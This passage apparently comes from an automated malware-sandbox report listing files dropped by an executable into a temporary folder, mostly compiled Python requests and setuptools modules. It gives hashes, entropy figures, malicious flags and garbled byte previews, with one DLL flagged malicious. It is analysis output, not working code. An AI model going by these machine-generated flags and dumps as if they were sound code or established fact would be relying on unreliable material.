                                                                                                                                            Preview:...........e..........................R.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z ..d.d.l.m!Z!m"Z"m#Z#..d.d.l$m%Z%m&Z&m'Z'..d.d.l(m)Z)m*Z*m+Z+m,Z,m-Z-m.Z...d.d.l(m.Z/..d.d.l(m0Z0..d.d.l(m.Z1..d.d.l(m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<m=Z=m>Z>m?Z?m@Z@mAZAmBZBmCZC..e6jD........e6jE........e6jF........e6jG........e6jH........f.ZId.ZJd.ZKd.ZL..G.d...d...............ZM..G.d...d...............ZN..G.d...d eN..............ZO..G.d!..d"eMeN..............ZP..G.d#..d$..............ZQd.S.)%z`.requests.models.~~~~~~~~~~~~~~~..This module contains the primary objects that power Requests.......N)...UnsupportedOperation)...DecodeError..LocationParseError..ProtocolError..ReadTimeoutError..SSLError)...RequestField)...encode_multipart_formdata)...parse_url.....)...to_native_string..unicode_is_ascii)...HTTPBasicAuth)...Callable..JSONDecodeError..Mapping

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\requests\packages.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1345
                                                                                                                                            Entropy (8bit):5.6308119616219985
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:ARkRzVoOZPoNRwod5VdsRJok9fzEyA22hCFzVkNNltK+exyd4+fP9:dRhoOZgEoXsX82oCFCzJDTN
                                                                                                                                            MD5:60BB561FF84652C4672BB9202287E2A5
                                                                                                                                            SHA1:1CCCA7942A36DB31AEDFA1F26EBCFEB305118DA8
                                                                                                                                            SHA-256:67C84916D4BCFCDB7400F75DF3C1BBA3386ECAEF36923C096BD6DAECA97B9C5D
                                                                                                                                            SHA-512:0D526CF592F6516ACFF8EBC64779A9E7F8424227F32F051653EA3341E507714E33C90C3EC241190DFFD865C2744951669BB6C0E4280762F893E13F69A2A6D7C1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.Z...d.d.l.Z.n&#.e.$.r...d.d.l.Z.d.d.l.Z...e.j.........d.d.d...................Y.n.w.x.Y.w.d.D.]aZ...e.e.................e...............e.<.....e.e.j.......................D.]8Z.e.e.k.....s.e.......................e...d.................r.e.j.........e...........e.j.........d.e.....<....9.be.j.........Z...e.e.j.......................D.]NZ.e.e.k.....s.e.......................e...d.................r.e.......................e.d...............Z.e.j.........e...........e.j.........d.e.....<....Od.S.)......N..ignorez.Trying to detect..charset_normalizer)...module)...urllib3..idna...z.requests.packages...chardet)...sysr......ImportError..warningsr......filterwarnings..package..__import__..locals..list..modules..mod..startswith..__name__..target..replace........eC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\packages.py..<module>r........s......................W.....N.N.N.N........W.....W.....W.....O.O.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\requests\sessions.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):29704
                                                                                                                                            Entropy (8bit):5.5004162425808625
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:p9AjZwMSwy+doWTql+9QNJ1nHgKQnlAqOFPS:pYwMa+dTZ6NJ5HZelzOFa
                                                                                                                                            MD5:A13A456CEC38FF385236681DAEBA326A
                                                                                                                                            SHA1:4120CDCC0F3B879BBDED13735800562E3DF6B28A
                                                                                                                                            SHA-256:221F12B6F60159B89C4EA48904EB747161207369EA14D640AB2A747159BA3F43
                                                                                                                                            SHA-512:553B3C721F96FB4CA6B3B82690C41C4A08A95E98D799AD2A5B17863AFA6E340A44AF20B2790CA20279D98053A70C8A56151E6E27ED3E11327DE0CDF001538F3C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.v.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l m!Z!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+m,Z,m-Z-m.Z.m/Z/m0Z0m1Z1m2Z2m3Z3..e.j4........d.k.....r.e.j5........Z6n.e.j.........Z6e.f.d...Z7e.f.d...Z8..G.d...d...............Z9..G.d...d.e9..............Z:d...Z;d.S.).z..requests.sessions.~~~~~~~~~~~~~~~~~..This module provides a Session object to manage and persist settings across.requests (cookies, auth, proxies).......N)...OrderedDict)...timedelta.....)...to_native_string)...HTTPAdapter)..._basic_auth_str)...Mapping..cookielib..urljoin..urlparse)...RequestsCookieJar..cookiejar_from_dict..extract_cookies_to_jar..merge_cookies)...ChunkedEncodingError..ContentDecodingError..InvalidSchema..TooManyRedirects)...default_hooks..dispatch_hook)...DEFAULT_REDIRECT_LIMIT..REDIRECT_STATI..PreparedRequest..Request)

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\requests\status_codes.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6248
                                                                                                                                            Entropy (8bit):5.802759404482601
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:J+vEE3FQaXQ/cMZI3SUpWBD7iC/U6+VdF2cHYdu43KFkLqVprW9fhM1:JWn3FKFICFBXiAqF2UmFKX3qC
                                                                                                                                            MD5:9E82B54B5AC4210C2A0D4B2C22266DC7
                                                                                                                                            SHA1:C81F044EDCF09A00D8357755D4A9ADC11E0AC195
                                                                                                                                            SHA-256:00D54D3D7B26C50BF2A919C43939EA916036012244D0E6B3355D448EB8678D28
                                                                                                                                            SHA-512:F4D92CC611C6829C891528CFCF0E0689F28EB888D2E806AF34659C9C4BEE42A414D3C8C26DDB73D2C68D0F4CC3E3B812493B0AD1FDE56C3CA2D9A7F8AF21FBFC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z...e.d.................Z.d...Z...e.................d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``code

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\requests\structures.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6233
                                                                                                                                            Entropy (8bit):5.188493190406779
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:jS2Jg2JgabXXMRfI0ILAFoEYo8kPIq3+UmidBYB6w9SXV4E:jS0g2JrbXXM1aL88kQq3LRm6oSl4E
                                                                                                                                            MD5:FF370BEF304E20F198D84A8AE9514759
                                                                                                                                            SHA1:82B40F1FD2124BDA29C449962447178C15F02860
                                                                                                                                            SHA-256:695A544E90E0D2CE32708A267F08020D4BEF26D4EA881EA93E5C422F85EDBDD2
                                                                                                                                            SHA-512:70982521B557665E6C56D216F25E1C92F730DB7E8CB1509AC50ACCF8F04C9C30082100E6A8B83D3984AD1991D1156C132E64D803AFD3A4EF13DE6F240B47BD94
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e`.........................^.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.....G.d...d.e...............Z...G.d...d.e...............Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc.....................P.....e.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\requests\utils.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40255
                                                                                                                                            Entropy (8bit):5.566569008851685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:178Gdle4sAaQIJJQzcICNHmGfsDJlREMFkjjo33c6y:1wGdlraFvHmGfslEMFkjjaMv
                                                                                                                                            MD5:D02820FC720E48A70ABE471EA877B672
                                                                                                                                            SHA1:A0BBFECEE4FCF2FFE3BE70CD57815FDDDA979B32
                                                                                                                                            SHA-256:8C028BB1D194CFFA5BAB0BC9529E242658C24947BF8C60221D6DBB23E14DC1D3
                                                                                                                                            SHA-512:42E62F13548CF3D2BAB6A0E9952904F22D55DA5E4BC2564ECA70A4A986F91D859D13398ED5FC8EEC6144CFC5A6DCF0AABB5A6A070B97EACE7953E012F8C90842
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................f.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2..e.j3......................Z4d.d.d...Z5d..6......................e.j7........d...e.d.................d.......................................Z8e.j9........d.k.....r.d...Z:d...Z"d...Z;d...Z<dJd...Z=d...Z>d ..Z?e.j@........d!................ZAd"..ZBd#..ZCd$..ZDd%..ZEdJd&..ZFd'..ZGd(..ZHd)..ZId*..ZJd+..ZKd,..ZLd-..ZMd...ZN..eOd/..............ZPd0..ZQd1..ZRd2..ZSd3..ZTd4..ZUd5..ZVe.j@........d6................ZWd7..ZXdKd8..ZYd9..ZZdLd:..Z[dMd<..Z\d=..Z]d>..Z^d?._....................d@..............Z`e`dAz...Zae`dBz...ZbdC..ZcdD..ZddE..ZedF..ZfdG..ZgdH..ZhdI..Zid.S.)Nz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\select.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):30480
                                                                                                                                            Entropy (8bit):6.578957517354568
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                                                                                                            MD5:C97A587E19227D03A85E90A04D7937F6
                                                                                                                                            SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                                                                                                            SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                                                                                                            SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_deprecation_warning.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):667
                                                                                                                                            Entropy (8bit):5.144450534285507
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:BO0p3Cn2/M8YpAbBTAxMFoQNcuCR5Pr/2IpRVdUo///slFmeleUkl:E0p3CnmrlbBTAxEoT7R5r2mPv6edl
                                                                                                                                            MD5:2D9B83BC8ED080FA75B116E940CE6466
                                                                                                                                            SHA1:0733171DEF2B466A4B3D8456361FD0D7C37C0546
                                                                                                                                            SHA-256:54B0EE69DA6BF0852A1BB9E020807F8F80B3A3F7AD1C53C598476F01654B2DCE
                                                                                                                                            SHA-512:51EE5593D27C2B3574D54F1668A86FBAB8F414F77472BBA9B0187DE9623424D2A7EC2D1250E6F7ED9C15527478B4970761643F448D426ECD693071BA3C3B2E40
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................".......G.d...d.e...............Z.d.S.).c...........................e.Z.d.Z.d.Z.d.S.)...SetuptoolsDeprecationWarningz.. Base class for warning deprecations in ``setuptools``.. This class is not derived from ``DeprecationWarning``, and as such is. visible by default.. N)...__name__..__module__..__qualname__..__doc__........sC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\_deprecation_warning.pyr....r........s..................................r....r....N)...Warningr....r....r....r......<module>r........s9..................................7.........................r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_distutils\archive_util.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10684
                                                                                                                                            Entropy (8bit):5.659478978379671
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:U1cKHOIRDrgHiNAu/gISt4YwM1LwBRpdENZbTuzwOpjjHDG27mD:U7D8RD7tbr2BRpdEOTnHK27w
                                                                                                                                            MD5:7554C3DD10E4FF651B6FB739F587FE4E
                                                                                                                                            SHA1:B8C592C6E5C31639E5EDD2F0E6E59B180967EEB2
                                                                                                                                            SHA-256:22FA00C78A655DE7EB24DBE7B735DB30B04E3CF595066D08055B3D8DA9014709
                                                                                                                                            SHA-512:5E6964F2518A198BD6EBB965D2089F03AB9974F3E0631D0F62B20931A718623AF3FBEC4ACDF86C5AFAAA13642DACC7C1593920A9437AC4BDBC03D47A68AE292A
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.!........................H.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z...d.d.l.Z.n.#.e.$.r...d.Z.Y.n.w.x.Y.w.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....d.d.l.m.Z...n.#.e.$.r...d.Z.Y.n.w.x.Y.w...d.d.l.m.Z...n.#.e.$.r...d.Z.Y.n.w.x.Y.w.d...Z.d...Z...d.d...Z.d.d...Z.e.d.g.d.f.e.d.g.d.f.e.d.g.d.f.e.d.g.d.f.e.d.g.d.f.e.g.d.f.d...Z.d...Z.............d.d...Z.d.S.) zodistutils.archive_util..Utility functions for creating archive files (tarballs, zip files,.that sort of thing)......N)...warn)...DistutilsExecError)...spawn)...mkpath)...log)...getpwnam)...getgrnamc.....................v.....t.............|...d.S...t...........|...............}.n.#.t...........$.r...d.}.Y.n.w.x.Y.w.|...|.d...........S.d.S.).z"Returns a gid, given a group name.N.....).r......KeyError....name..results.... .vC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\_distutils\archive_util.py.._get_gidr.... ....\............4.<....t.........$..............................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_distutils\bcppcompiler.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13510
                                                                                                                                            Entropy (8bit):5.433564279968124
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:2IxGmxOqGvRV/mWqV+ndKsrhk21ntLmlxOX1:26rHGXmWqV+ndKsrhk21ntLUxO
                                                                                                                                            MD5:D2B87E6D5C75A9188E626B8A53A1ED33
                                                                                                                                            SHA1:3A5DA20F36E44D82748F08EFB2CF951E41F3B08A
                                                                                                                                            SHA-256:AC89F482C801E01A800A072F6ABAB4D51189763788200C3882B622B3E89D14F7
                                                                                                                                            SHA-512:86B358ED8043FFD2430DE0C37E3ED82744E300FCE4DB41D053058AC6C5C70BB8EE7A6F6FE9B9ADA5E13A5A66B1AAD8BF8C43F13CA5A7A5B7A44B7C863B7687E9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.9.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j.........d.e...................G.d...d.e...............Z.d.S.).z.distutils.bcppcompiler..Contains BorlandCCompiler, an implementation of the abstract CCompiler class.for the Borland C++ compiler.......N)...DistutilsExecError..CompileError..LibError..LinkError..UnknownFileError)...CCompiler..gen_preprocess_options)...write_file)...newer)...logz.bcppcompiler is deprecated and slated to be removed in the future. Please discontinue use or file an issue with pypa/distutils describing your use case.c............................e.Z.d.Z.d.Z.d.Z.i.Z.d.g.Z.g.d...Z.e.e.z...Z.d.Z.d.Z.d.Z.d.x.Z.Z.d.Z.d...f.d...Z...............d.d...Z...d.d...Z.....................d.d...Z.d.d...Z.d.d...Z...........d.d...Z...x.Z.S.)...BCPPCompilerz.Concrete class that implements an interface to the Borland C/C++. compiler, as defined by the CCompiler abstract class..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_distutils\ccompiler.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0--21759, spot sensor temperature 0.000000, unit celsius, color scheme 0, minimum point enabled, calibration: offset 555728502784.000000, slope 150064443183612297216.000000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):46409
                                                                                                                                            Entropy (8bit):5.454576297813922
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:3MXWmfHtYSom9e03F3EKTxdw9BGljjMH66Oi/+fc:8nfEgeS3E0Tw97kk
                                                                                                                                            MD5:7E201C58E6E1B09B37E67BA9CA32935F
                                                                                                                                            SHA1:15C2574869CFE73A6C2F055791E45718A2678EBD
                                                                                                                                            SHA-256:2F0C4F6D6554FF5C4E57A494D713760265A516D66A0B0D4091C1FD655466BA0E
                                                                                                                                            SHA-512:018459B60DE148DDE82FAF05AD9EC5D8D60624EAE00829F8E7AD928C39A0386287A3116E144A097F4A666FB525A4FF4A7B74E36F9D3D3C9262E19934DAAF0C1D
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d...............Z.d.Z.d.d...Z.d.d.d.d.d.d...Z.d...Z.d.d...Z.d...Z.d...Z.d.S.).z.distutils.ccompiler..Contains CCompiler, an abstract base class that defines the interface.for the Distutils compiler abstraction model......N)...CompileError..LinkError..UnknownFileError..DistutilsPlatformError..DistutilsModuleError)...spawn)...move_file)...mkpath)...newer_group)...split_quoted..execute)...logc.....................P.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.d.d.d.d...Z.g.d...Z.g.Z...g.Z...dDd...Z.d...Z.d...Z.d...Z.d...Z.dEd...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z d...Z!d...Z"d...Z#dEd...Z$d...Z%d...Z&d ..Z'd!..Z(..........dFd"..Z)..............dGd#..Z*d$..Z+..dHd%..Z,d&Z-d'Z.d(Z/....................dId)..Z0....................dId*..Z1....................dId+..Z2........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_distutils\cmd.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18923
                                                                                                                                            Entropy (8bit):5.375177275632276
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:d+cJPBGqHHilK/bs5oHCgSqVUT4b/WoSdTTCoa:7pniGbTHCFQLGdTTCoa
                                                                                                                                            MD5:DDF12AA6F27D3717B9DBF1B348135113
                                                                                                                                            SHA1:74FD3B26423B4A5DBB2593D9A5906045E1ECE1C4
                                                                                                                                            SHA-256:386DB0EE28815C654BB429A879DC6E618B2FC850FBF599D56B80BA8CFB023999
                                                                                                                                            SHA-512:0B9F4C0B94AE12C7DE022B1FF6E7ECB26AA031BA385818A9D2E267FF6926CD5EB52C199AB97665F0DE8C46E4CA02E9068E13843125130902A06825AA85EB6885
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e5F........................p.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d...............Z.d.S.).ztdistutils.cmd..Provides the Command class, the base class for the command classes.in the distutils.command package.......N)...DistutilsOptionError)...util..dir_util..file_util..archive_util..dep_util....logc...........................e.Z.d.Z.d.Z.g.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d%d...Z.d...Z.d&d...Z.d...Z.d'd...Z.d'd...Z.d...Z.d'd...Z.d...Z.d...Z.d...Z.d...Z.d&d...Z.d(d...Z.d...Z.d...Z.d...Z.d)d...Z.d*d...Z...d+d...Z.........d,d ..Z.d&d!..Z.d-d"..Z ..d.d#..Z!..d/d$..Z"d.S.)0..Commanda}...Abstract base class for defining command classes, the "worker bees". of the Distutils. A useful analogy for command classes is to think of. them as subroutines with local variables called "options". The options. are "declared" in 'initialize_options()' and "defined" (given their. final values, aka "finalized") in 'finalize_options()

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_distutils\command\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):569
                                                                                                                                            Entropy (8bit):5.251732513354966
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:BGmlBTM2DCD+voM+IbYVf+0rrVWx4Ooi6S2K+nS/2IpRVhraUzlYm:QmlBTMeCD8RbY4CYxNKS2E2mjeUJV
                                                                                                                                            MD5:A0081A9DA7B204807ACD61C200321654
                                                                                                                                            SHA1:00834E0730ADB186E14E1F0729BD91931D175686
                                                                                                                                            SHA-256:5EEC417A5C2D1F3824347B4DC09E79CB306749E3D8A351CCA03537451BC16CB3
                                                                                                                                            SHA-512:FF3831393DE78EADDBB6AA2694B3A489799E42446FFBC00DD6BF480B65F68AE3CBA51E53627C91DFA6FCCE70D739C92DEE4A8594DEAB66FECFC6417463DC48C9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.g.d...Z.d.S.).z\distutils.command..Package containing implementation of all the standard Distutils.commands.)...build..build_py..build_ext..build_clib..build_scripts..clean..install..install_lib..install_headers..install_scripts..install_data..sdist..register..bdist..bdist_dumb..bdist_rpm..check..uploadN)...__doc__..__all__........zC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\setuptools\_distutils\command\__init__.py..<module>r........s$.......................................r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_distutils\command\_framework_compat.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2810
                                                                                                                                            Entropy (8bit):5.508053428590671
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:dmDEt0wskxKLqleRv4aArcXA2mCzjhjXsiCLgRCPerthzGOhJLbXf6997ZieqlB2:eEt0wRhleRgrcnBjXLO0jqMJi99PqlB2
                                                                                                                                            MD5:B3328ABAF4C2DF8D896427A4CBFF59AC
                                                                                                                                            SHA1:42C4D3C768BE9B73A17E25F21928EBD0B6EFE736
                                                                                                                                            SHA-256:D68A6F68DEC503DF2E0E6691787BB21C63084F13BCF34AC1BFBB684DB348274D
                                                                                                                                            SHA-512:6F9C52E90AB38239017F49CCDF4B52F54D5CCC121457AD02E338B288F737624B1B99829034EEEA5BCAAA3D6A53C16AF1AE55A76E46A9D01CD8B5239A61AE57F1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eN...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...e.j.......................d.................Z...e...e.d.d.d.d.d.d.d.d.................................Z...e.j.......................d.................Z.d...Z.d.S.).z6.Backward compatibility for homebrew builds on macOS.......Nc.....................$.....d.t...........j.........c.x.k.....o.d.k.....n.c...}.t...........j.........d.k.....o.t...........j.........}.d.t...........j.........d...............v.}.t...........j.........t...........j.........k.....}.t...........j...............................d...............}.|.o.|.o.|.o.|...o.|...S.).z^. Only enabled for Python 3.9 framework homebrew builds. except ensurepip and venv.. )...........).r...........darwin..Cellar..projectbase..ENSUREPIP_OPTIONS)...sys..version_info..platform.._framework..sysconfig..get_config_var..prefix..base_prefix..os..environ..get)...PY39..framework..homebrew..venv..ensurepips.... ..C:\Users\Administrator\AppDat

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\setuptools\_distutils\command\bdist.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6063
                                                                                                                                            Entropy (8bit):5.465720081490261
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:dYpD2cOpwNyW3PPI5Wxkwmd/q/q9qcF/tQb05DMWEz/qEYVJGz0+op:dYpacOpwNFfQ5Wxk3db9jbQw5bq/dSJh
                                                                                                                                            MD5:8999ED02BE2DCFB0D14492F385BC011D
                                                                                                                                            SHA1:B295D9F26497103AE21675600D69579389A4B357
                                                                                                                                            SHA-256:70E544AC95EE4A75781917428ABFEDC480E7493BCD0C44725104A9FC4A01D742
                                                                                                                                            SHA-512:6972B0841AE8AD9F6346F9D1900966004E59EDCAAF769851B66F7382689822C5D37BDF2CFBD54AA2EA01D2FBB18651C4FFCAB32B75AFD74B7EC12DDE0EB731B5
                                                                                                                                            Malicious:false
